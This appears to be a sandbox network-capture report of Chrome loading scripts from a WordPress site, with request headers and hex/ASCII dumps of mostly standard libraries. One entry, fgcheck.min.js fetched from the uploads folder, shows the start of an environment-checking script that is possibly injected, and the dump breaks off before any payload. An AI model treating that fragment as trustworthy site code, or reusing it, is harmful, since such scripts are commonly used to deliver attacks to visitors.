                                                                                                          2024-12-12 11:58:33 UTC14681INData Raw: 79 3a 22 61 64 64 45 6e 63 6f 64 69 6e 67 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 74 68 69 73 3b 69 66 28 67 2e 66 62 71 3d 3d 6e 75 6c 6c 7c 7c 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 69 66 28 74 68 69 73 2e 6d 6f 64 75 6c 65 45 6e 63 6f 64 69 6e 67 73 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 76 61 72 20 66 3d 62 28 67 2e 66 62 71 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 2c 64 2e 6f 62 6a 65 63 74 28 29 29 3b 69 66 28 66 3d 3d 6e 75 6c 6c 29 72 65 74 75 72 6e 3b 66 3d 6b 28 69 28 6a 28 66 29 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 63 2e 6d 6f 64 75 6c 65 45 6e 63
                                                                                                          Data Ascii: y:"addEncodings",value:function(a){var c=this;if(g.fbq==null||g.fbq.__fbeventsResolvedModules==null)return;if(this.moduleEncodings==null)return;var f=b(g.fbq.__fbeventsResolvedModules,d.object());if(f==null)return;f=k(i(j(f),function(a){return c.moduleEnc
                                                                                                          2024-12-12 11:58:33 UTC16384INData Raw: 62 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 55 74 69 6c 73 22 29 3b 76 61 72 20 64 3d 62 2e 6d 61 70 2c 65 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 61 72 61 6d 4c 69 73 74 22 29 2c 68 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 42 65 61 63 6f 6e 22 29 2c 69 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 47 45 54 22 29 3b 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 58 48 52 22 29 3b 76 61 72 20 6a
                                                                                                          Data Ascii: b=f.getFbeventsModules("SignalsFBEventsUtils");var d=b.map,e=f.getFbeventsModules("SignalsParamList"),h=f.getFbeventsModules("signalsFBEventsSendBeacon"),i=f.getFbeventsModules("signalsFBEventsSendGET");f.getFbeventsModules("signalsFBEventsSendXHR");var j
                                                                                                          2024-12-12 11:58:33 UTC16384INData Raw: 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 71 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 3d 22 73 74 72 69 6e 67 22 26 26 74 79 70 65 6f 66 20 61 21 3d 3d 22 6e 75 6d 62 65 72 22 29 74 68 72 6f 77 20 6e 65 77 20 67 28 29 3b 72 65 74 75 72 6e 20 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 69 28 61 29 29 21 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 7c 7c 61 3d 3d 6e
                                                                                                          Data Ascii: typeof a!=="string")throw new g();return a}}function q(){return function(a){if(typeof a!=="string"&&typeof a!=="number")throw new g();return a}}function r(){return function(a){if((typeof a==="undefined"?"undefined":i(a))!=="object"||Array.isArray(a)||a==n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          105192.168.2.2449899147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:32 UTC717OUTGET /wp-content/themes/ciena/assets/js/mega-menu.js?ver=1.0.8 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:33 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:32 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Sat, 26 Mar 2022 17:38:09 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 3826
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:33 UTC3826INData Raw: 3b 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 20 2f 2f 20 53 74 61 72 74 20 6f 66 20 75 73 65 20 73 74 72 69 63 74 0a 20 20 20 20 2f 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 20 20 20 20 52 65 73 69 7a 65 20 6d 65 67 61 20 6d 65 6e 75 0a 20 20 20 20 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 2a 2f 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 72 65 73 70 6f 6e 73 69 76 65 5f 6d 65 67 61 6d 65 6e 75 5f 69 74 65 6d 28 63 6f 6e 74 61 69 6e 65 72 2c 20 65 6c 65 6d 65 6e 74 29 20 7b 0a 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: ;(function ($) { "use strict"; // Start of use strict /* --------------------------------------------- Resize mega menu --------------------------------------------- */ function responsive_megamenu_item(container, element) {


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          106192.168.2.2449898147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:32 UTC748OUTGET /wp-content/plugins/woocommerce/assets/js/select2/select2.full.min.js?ver=4.0.3-wc.6.6.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:33 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:33 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 24 Jun 2022 09:41:11 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 74131
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:33 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 53 65 6c 65 63 74 32 20 34 2e 30 2e 33 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 73 65 6c 65 63 74 32 2e 67 69 74 68 75 62 2e 69 6f 0a 20 2a 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 65 6c 65 63 74 32 2f 73 65 6c 65 63 74 32 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 2e 6d 64 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 28 72 65 71 75
                                                                                                          Data Ascii: /*! * Select2 4.0.3 * https://select2.github.io * * Released under the MIT license * https://github.com/select2/select2/blob/master/LICENSE.md */!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?e(requ
                                                                                                          2024-12-12 11:58:33 UTC16384INData Raw: 53 65 6c 65 63 74 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 67 65 74 28 22 65 73 63 61 70 65 4d 61 72 6b 75 70 22 29 28 6e 28 65 2c 74 29 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 6c 65 63 74 69 6f 6e 43 6f 6e 74 61 69 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 28 27 3c 6c 69 20 63 6c 61 73 73 3d 22 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 5f 5f 63 68 6f 69 63 65 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 5f 5f 63 68 6f 69 63 65 5f 5f 72 65 6d 6f 76 65 22 20 72 6f 6c 65 3d 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 22 3e 26 74 69 6d 65 73 3b 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 27 29 7d 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 75
                                                                                                          Data Ascii: Selection");return this.options.get("escapeMarkup")(n(e,t))},o.prototype.selectionContainer=function(){return i('<li class="select2-selection__choice"><span class="select2-selection__choice__remove" role="presentation">&times;</span></li>')},o.prototype.u
                                                                                                          2024-12-12 11:58:33 UTC16384INData Raw: 74 61 28 74 68 69 73 2c 22 64 61 74 61 22 29 7d 29 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 71 75 65 72 79 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 5b 5d 2c 69 3d 74 68 69 73 3b 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 28 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 72 28 74 68 69 73 29 3b 28 65 2e 69 73 28 22 6f 70 74 69 6f 6e 22 29 7c 7c 65 2e 69 73 28 22 6f 70 74 67 72 6f 75 70 22 29 29 26 26 28 65 3d 69 2e 69 74 65 6d 28 65 29 2c 6e 75 6c 6c 21 3d 3d 28 65 3d 69 2e 6d 61 74 63 68 65 73 28 74 2c 65 29 29 26 26 6e 2e 70 75 73 68 28 65 29 29 7d 29 2c 65 28 7b 72 65 73 75 6c 74 73 3a 6e 7d 29 7d 2c 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 61 64 64 4f 70 74 69 6f 6e 73 3d 66 75 6e 63 74
                                                                                                          Data Ascii: ta(this,"data")})},n.prototype.query=function(t,e){var n=[],i=this;this.$element.children().each(function(){var e=r(this);(e.is("option")||e.is("optgroup"))&&(e=i.item(e),null!==(e=i.matches(t,e))&&n.push(e))}),e({results:n})},n.prototype.addOptions=funct
                                                                                                          2024-12-12 11:58:33 UTC16384INData Raw: 69 6e 66 69 6e 69 74 65 53 63 72 6f 6c 6c 22 2c 22 2e 2f 64 72 6f 70 64 6f 77 6e 2f 61 74 74 61 63 68 42 6f 64 79 22 2c 22 2e 2f 64 72 6f 70 64 6f 77 6e 2f 6d 69 6e 69 6d 75 6d 52 65 73 75 6c 74 73 46 6f 72 53 65 61 72 63 68 22 2c 22 2e 2f 64 72 6f 70 64 6f 77 6e 2f 73 65 6c 65 63 74 4f 6e 43 6c 6f 73 65 22 2c 22 2e 2f 64 72 6f 70 64 6f 77 6e 2f 63 6c 6f 73 65 4f 6e 53 65 6c 65 63 74 22 2c 22 2e 2f 69 31 38 6e 2f 65 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 70 2c 68 2c 66 2c 67 2c 6d 2c 79 2c 76 2c 5f 2c 77 2c 24 2c 62 2c 74 2c 78 2c 41 2c 43 2c 53 2c 4f 2c 45 2c 44 2c 54 2c 71 2c 6a 2c 4c 2c 6b 2c 50 2c 49 2c 4d 2c 52 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 74 68 69 73 2e 72 65 73 65 74 28 29 7d 72 65 74 75 72 6e 20 6e 2e 70 72 6f 74 6f 74 79 70
                                                                                                          Data Ascii: infiniteScroll","./dropdown/attachBody","./dropdown/minimumResultsForSearch","./dropdown/selectOnClose","./dropdown/closeOnSelect","./i18n/en"],function(p,h,f,g,m,y,v,_,w,$,b,t,x,A,C,S,O,E,D,T,q,j,L,k,P,I,M,R,e){function n(){this.reset()}return n.prototyp
                                                                                                          2024-12-12 11:58:33 UTC8595INData Raw: 65 72 20 74 68 61 74 20 6f 76 65 72 72 69 64 65 73 20 74 68 65 20 60 63 75 72 72 65 6e 74 60 20 6d 65 74 68 6f 64 2e 20 54 68 69 73 20 6d 65 74 68 6f 64 20 69 73 20 6e 6f 77 20 63 61 6c 6c 65 64 20 6d 75 6c 74 69 70 6c 65 20 74 69 6d 65 73 20 69 6e 73 74 65 61 64 20 6f 66 20 61 20 73 69 6e 67 6c 65 20 74 69 6d 65 20 77 68 65 6e 20 74 68 65 20 69 6e 73 74 61 6e 63 65 20 69 73 20 69 6e 69 74 69 61 6c 69 7a 65 64 2e 20 53 75 70 70 6f 72 74 20 77 69 6c 6c 20 62 65 20 72 65 6d 6f 76 65 64 20 66 6f 72 20 74 68 65 20 60 69 6e 69 74 53 65 6c 65 63 74 69 6f 6e 60 20 6f 70 74 69 6f 6e 20 69 6e 20 66 75 74 75 72 65 20 76 65 72 73 69 6f 6e 73 20 6f 66 20 53 65 6c 65 63 74 32 22 29 2c 74 68 69 73 2e 69 6e 69 74 53 65 6c 65 63 74 69 6f 6e 3d 6e 2e 67 65 74 28 22 69 6e
                                                                                                          Data Ascii: er that overrides the `current` method. This method is now called multiple times instead of a single time when the instance is initialized. Support will be removed for the `initSelection` option in future versions of Select2"),this.initSelection=n.get("in


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          107192.168.2.2449900147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:32 UTC525OUTGET /wp-content/uploads/fgcheck.min.js?ver=1.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:33 UTC281INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:33 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 12 Sep 2023 10:03:27 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 375
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:33 UTC375INData Raw: 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 67 61 70 3a 31 70 78 3b 27 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 22 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 3b 6c 65 74 20 74 3d 31 3d 3d 3d 65 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 3b 72 65 74 75 72 6e 20 65 2e 72 65 6d 6f 76 65 28 29 2c 21 74 7d 28 29 7c 7c 77 69 6e 64 6f 77 2e 5f 74 65 73 74 46 42 29 7b 6c 65 74 20 65 3d 64 6f 63 75
                                                                                                          Data Ascii: if(function(){let e=document.createElement("div");e.innerHTML="<div style='display:flex;flex-direction:column;gap:1px;'><div></div><div></div></div>",document.body.appendChild(e);let t=1===e.scrollHeight;return e.remove(),!t}()||window._testFB){let e=docu


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          108192.168.2.2449901147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:32 UTC571OUTGET /wp-content/themes/ciena/assets/vendors/perfect-scrollbar/perfect-scrollbar.js?ver=1.5.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:33 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:33 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Sat, 26 Mar 2022 17:38:49 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 38464
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:33 UTC16384INData Raw: 2f 2a 21 0a 20 2a 20 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 20 76 31 2e 35 2e 30 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 30 20 48 79 75 6e 6a 65 20 4a 75 6e 2c 20 4d 44 42 6f 6f 74 73 74 72 61 70 20 61 6e 64 20 43 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 0a 20 2a 2f 0a 0a 28 66 75 6e 63 74 69 6f 6e 20 28 67 6c 6f 62 61 6c 2c 20 66 61 63 74 6f 72 79 29 20 7b 0a 20 20 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 20 3d 3d 3d 20 27 6f 62 6a 65 63 74 27 20 26 26 20 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 3f 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 20 3d 20 66 61 63 74 6f 72 79 28 29 20 3a 0a 20 20 74 79 70 65 6f 66 20 64 65 66 69
                                                                                                          Data Ascii: /*! * perfect-scrollbar v1.5.0 * Copyright 2020 Hyunje Jun, MDBootstrap and Contributors * Licensed under MIT */(function (global, factory) { typeof exports === 'object' && typeof module !== 'undefined' ? module.exports = factory() : typeof defi
                                                                                                          2024-12-12 11:58:33 UTC16384INData Raw: 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 69 2e 65 76 65 6e 74 2e 62 69 6e 64 28 69 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 20 27 74 6f 75 63 68 6d 6f 76 65 27 2c 20 6d 6f 75 73 65 4d 6f 76 65 48 61 6e 64 6c 65 72 29 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 69 5b 73 63 72 6f 6c 6c 62 61 72 59 52 61 69 6c 5d 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 63 6c 73 2e 73 74 61 74 65 2e 63 6c 69 63 6b 69 6e 67 29 3b 0a 0a 20 20 20 20 20 20 65 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 69 2e 65 76 65 6e 74 2e 62 69 6e 64 28 69 5b 73 63 72 6f 6c 6c 62 61 72 59 5d 2c 20 27 6d 6f 75 73 65 64 6f 77 6e 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 65 29 20 7b 0a 20 20 20 20 20 20 62 69 6e 64
                                                                                                          Data Ascii: } else { i.event.bind(i.ownerDocument, 'touchmove', mouseMoveHandler); } i[scrollbarYRail].classList.add(cls.state.clicking); e.stopPropagation(); } i.event.bind(i[scrollbarY], 'mousedown', function (e) { bind
                                                                                                          2024-12-12 11:58:33 UTC5696INData Raw: 20 20 20 20 74 68 69 73 2e 6e 65 67 61 74 69 76 65 53 63 72 6f 6c 6c 41 64 6a 75 73 74 6d 65 6e 74 20 3d 20 74 68 69 73 2e 69 73 4e 65 67 61 74 69 76 65 53 63 72 6f 6c 6c 0a 20 20 20 20 20 20 3f 20 65 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 57 69 64 74 68 20 2d 20 65 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 57 69 64 74 68 0a 20 20 20 20 20 20 3a 20 30 3b 0a 20 20 20 20 74 68 69 73 2e 65 76 65 6e 74 20 3d 20 6e 65 77 20 45 76 65 6e 74 4d 61 6e 61 67 65 72 28 29 3b 0a 20 20 20 20 74 68 69 73 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 20 3d 20 65 6c 65 6d 65 6e 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 20 7c 7c 20 64 6f 63 75 6d 65 6e 74 3b 0a 0a 20 20 20 20 74 68 69 73 2e 73 63 72 6f 6c 6c 62 61 72 58 52 61 69 6c 20 3d 20 64 69 76 28 63 6c 73 2e 65 6c 65 6d
                                                                                                          Data Ascii: this.negativeScrollAdjustment = this.isNegativeScroll ? element.scrollWidth - element.clientWidth : 0; this.event = new EventManager(); this.ownerDocument = element.ownerDocument || document; this.scrollbarXRail = div(cls.elem


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          109192.168.2.2449902147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:32 UTC575OUTGET /wp-content/plugins/fami-templatekits/assets/vendors/bootstrap/js/bootstrap.min.js?ver=4.3.1 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:33 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:33 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Tue, 10 Aug 2021 13:55:31 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 58072
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:33 UTC16384INData Raw: 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 33 2e 31 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 39 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22
                                                                                                          Data Ascii: /*! * Bootstrap v4.3.1 (https://getbootstrap.com/) * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t,e){"
